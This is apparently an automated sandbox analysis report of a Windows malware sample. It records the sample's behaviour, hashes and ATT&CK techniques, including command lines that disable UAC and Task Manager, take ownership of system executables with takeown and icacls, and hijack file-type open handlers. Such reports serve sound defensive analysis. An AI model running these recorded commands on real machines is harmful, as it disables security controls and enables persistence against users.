e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25

Analysis

max time kernel
150s
max time network
120s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
28-10-2024 06:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Size

550KB
MD5

ef66bc948ca5ff1bd4e76191adc11b0a
SHA1

d1fb64af325b0cfaa165869d8fcafea672849fd3
SHA256

e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25
SHA512

914de2b160d607dfb87c19e52006c4c3724f8d96f7a7ae7d31d1219539745fc73a77e2484cc23459f33b16ee16f8356356380f759988e15dddbe5fd707b905d8
SSDEEP

6144:/pW2bgbbV28okoS1oWMkdlZQ5iinNrv26FYLIcw/3Scg1IReqYKztp0YcAvq:/pW2IoioS6p8IReqYKztp0YTvq

Score

10^/10

defense_evasion discovery evasion exploit persistence trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Disables Task Manager via registry modification
evasion

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Possible privilege escalation attempt 64 IoCs

exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exe

pid	process
2128	takeown.exe
5744	icacls.exe
3444	icacls.exe
4832	icacls.exe
4116	icacls.exe
2656	icacls.exe
4248	takeown.exe
1652	icacls.exe
5048	takeown.exe
1492	takeown.exe
3228	icacls.exe
4584	icacls.exe
4712	takeown.exe
2948	takeown.exe
1560	icacls.exe
2032	icacls.exe
5236	takeown.exe
1772	takeown.exe
1960	icacls.exe
5472	takeown.exe
3596	takeown.exe
4632	icacls.exe
4888	takeown.exe
5140	takeown.exe
5404	icacls.exe
560	takeown.exe
5036	icacls.exe
4232	icacls.exe
1496	takeown.exe
2732	takeown.exe
2864	icacls.exe
5356	icacls.exe
1640	takeown.exe
2668	takeown.exe
3300	icacls.exe
5864	icacls.exe
4920	icacls.exe
1476	icacls.exe
1864	icacls.exe
3568	icacls.exe
1144	takeown.exe
2692	icacls.exe
3104	icacls.exe
1964	icacls.exe
4076	takeown.exe
4376	icacls.exe
5392	takeown.exe
3328	takeown.exe
3992	takeown.exe
924	icacls.exe
3220	icacls.exe
3488	takeown.exe
3800	takeown.exe
4400	takeown.exe
4848	takeown.exe
2460	icacls.exe
2432	takeown.exe
3152	icacls.exe
3148	takeown.exe
4876	icacls.exe
948	icacls.exe
5284	takeown.exe
2580	takeown.exe
764	takeown.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid	process
4776	icacls.exe
1716	takeown.exe
5684	icacls.exe
5804	icacls.exe
1072	takeown.exe
3596	takeown.exe
4136	takeown.exe
5284	takeown.exe
896	icacls.exe
908	icacls.exe
3704	icacls.exe
536	takeown.exe
1640	takeown.exe
5432	takeown.exe
5472	takeown.exe
2900	icacls.exe
2672	takeown.exe
3504	icacls.exe
4204	takeown.exe
2692	icacls.exe
5140	takeown.exe
2252	takeown.exe
1520	takeown.exe
1188	icacls.exe
4412	icacls.exe
1656	icacls.exe
3084	takeown.exe
3356	icacls.exe
4712	takeown.exe
4920	icacls.exe
5628	icacls.exe
2384	takeown.exe
3444	icacls.exe
3772	icacls.exe
1960	icacls.exe
2792	takeown.exe
4940	takeown.exe
3152	icacls.exe
4216	icacls.exe
4760	takeown.exe
2256	takeown.exe
3132	takeown.exe
2884	takeown.exe
4832	icacls.exe
5068	icacls.exe
4772	icacls.exe
1552	takeown.exe
4028	takeown.exe
3780	icacls.exe
2668	takeown.exe
5560	takeown.exe
2412	takeown.exe
2124	icacls.exe
3052	takeown.exe
2200	icacls.exe
2664	icacls.exe
4512	takeown.exe
1712	icacls.exe
2368	icacls.exe
4436	icacls.exe
1772	takeown.exe
4060	icacls.exe
3148	takeown.exe
2032	icacls.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe BATCF %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Drops file in System32 directory 2 IoCs

Processes:

e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

description	ioc	process
File created	C:\Windows\System32\verifiergui.exe	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
File opened for modification	C:\Windows\System32\verifiergui.exe	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 13 IoCs

Processes:

e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe JPGIF %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe VBSSF %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe RTFDF %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe JPGIF %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe CMDSF %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe JPGIF %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe NTPAD %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe BATCF %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe JPGIF %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe HTMWF %1"	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

2092 reg.exe
2588 reg.exe

pid	process
2092	reg.exe
2588	reg.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

pid	process
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

pid process

3008 e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

Processes:

e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
Token: SeTakeOwnershipPrivilege	2976	takeown.exe
Token: SeTakeOwnershipPrivilege	1072	takeown.exe
Token: SeTakeOwnershipPrivilege	2948	takeown.exe
Token: SeTakeOwnershipPrivilege	1076	takeown.exe
Token: SeTakeOwnershipPrivilege	2760	takeown.exe
Token: SeTakeOwnershipPrivilege	2384	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	2136	takeown.exe
Token: SeTakeOwnershipPrivilege	3000	takeown.exe
Token: SeTakeOwnershipPrivilege	2252	takeown.exe
Token: SeTakeOwnershipPrivilege	1772	takeown.exe
Token: SeTakeOwnershipPrivilege	1084	takeown.exe
Token: SeTakeOwnershipPrivilege	2904	takeown.exe
Token: SeTakeOwnershipPrivilege	2560	takeown.exe
Token: SeTakeOwnershipPrivilege	944	takeown.exe
Token: SeTakeOwnershipPrivilege	1496	takeown.exe
Token: SeTakeOwnershipPrivilege	560	takeown.exe
Token: SeTakeOwnershipPrivilege	1520	takeown.exe
Token: SeTakeOwnershipPrivilege	108	takeown.exe
Token: SeTakeOwnershipPrivilege	2412	takeown.exe
Token: SeTakeOwnershipPrivilege	2256	takeown.exe
Token: SeTakeOwnershipPrivilege	1832	takeown.exe
Token: SeTakeOwnershipPrivilege	2004	takeown.exe
Token: SeTakeOwnershipPrivilege	836	takeown.exe
Token: SeTakeOwnershipPrivilege	2884	takeown.exe
Token: SeTakeOwnershipPrivilege	2580	takeown.exe
Token: SeTakeOwnershipPrivilege	1224	takeown.exe
Token: SeTakeOwnershipPrivilege	2792	takeown.exe
Token: SeTakeOwnershipPrivilege	2024	takeown.exe
Token: SeTakeOwnershipPrivilege	3912	takeown.exe
Token: SeTakeOwnershipPrivilege	3536	takeown.exe
Token: SeTakeOwnershipPrivilege	2244	takeown.exe
Token: SeTakeOwnershipPrivilege	2532	takeown.exe
Token: SeTakeOwnershipPrivilege	2672	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

description	pid	process	target process
PID 3008 wrote to memory of 2092	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	reg.exe
PID 3008 wrote to memory of 2092	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	reg.exe
PID 3008 wrote to memory of 2092	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	reg.exe
PID 3008 wrote to memory of 2588	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	reg.exe
PID 3008 wrote to memory of 2588	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	reg.exe
PID 3008 wrote to memory of 2588	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	reg.exe
PID 3008 wrote to memory of 2948	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2948	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2948	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 1172	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 1172	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 1172	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 1072	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 1072	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 1072	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 1348	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 1348	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 1348	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2976	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2976	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2976	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2436	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2436	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2436	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 1076	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 1076	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 1076	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2964	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2964	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2964	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2760	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2760	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2760	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2996	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2996	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2996	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2256	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2256	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2256	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2356	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2356	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2356	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2168	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2168	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2168	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2460	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2460	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2460	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2412	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2412	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2412	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2200	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2200	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2200	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 108	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 108	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 108	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 2144	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2144	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 2144	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe
PID 3008 wrote to memory of 3000	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 3000	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 3000	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	takeown.exe
PID 3008 wrote to memory of 828	3008	e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe	icacls.exe

C:\Users\Admin\AppData\Local\Temp\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
"C:\Users\Admin\AppData\Local\Temp\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe"
1⤵
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
- Modifies registry key
PID:2092

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Modifies registry key
PID:2588

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\bfsvc.exe"
2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2948

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:1172

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\HelpPane.exe"
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:1348

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\hh.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2436

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\splwow64.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2964

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\winhlp32.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2996

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\write.exe"
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2356

